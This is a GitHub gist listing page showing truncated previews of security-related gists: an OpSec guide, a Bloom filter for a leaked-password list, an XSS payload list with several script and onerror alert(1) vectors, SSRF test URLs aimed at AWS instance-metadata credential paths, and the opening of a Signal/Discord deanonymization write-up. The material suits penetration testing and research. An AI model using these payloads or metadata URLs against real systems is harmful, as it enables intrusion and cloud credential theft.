Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
Tony Carter xtremebeing
xtremebeing
/ OpSec
Created
June 11, 2020 22:02
— forked from JohnTroony/OpSec
Guide for proper Opsec and comsec for the paranoid.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # OPS Info | |
| ## Info: | |
| * Google Custom Alerts: http://google.com/alerts/ | |
| * Google Reverse Image search instructions: https://support.google.com/websearch/answer/1325808?hl=en | |
| ## Antitheft Apps : | |
| * Lookout: https://www.lookout.com/ |
xtremebeing
/ bloom.py
Created
June 11, 2020 22:03
— forked from JohnTroony/bloom.py
Simple Bloom filter implementation in Python 3 (for use with the HIBP password list)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # | |
| # Simple Bloom filter implementation in Python 3 | |
| # Copyright 2017 Hector Martin "marcan" <[email protected]> | |
| # Licensed under the terms of the MIT license | |
| # | |
| # Written to be used with the Have I been pwned? password list: | |
| # https://haveibeenpwned.com/passwords | |
| # | |
| # Download the pre-computed filter here (629MB, k=11, false positive p=0.0005): |
xtremebeing
/ 666_lines_of_XSS_vectors.html
Created
June 11, 2020 22:03
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
xtremebeing
/ cloud_metadata.txt
Created
June 15, 2020 15:54
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
xtremebeing
/ WAHH_Task_Checklist.md
Created
September 5, 2020 20:39
— forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
xtremebeing
/ WAHH_Task_Checklist.md
Created
February 12, 2021 01:27
— forked from amotmot/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
xtremebeing
/ research.md
Created
January 21, 2025 17:02
— forked from hackermondev/research.md
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform
hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.
3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.
I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:
By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k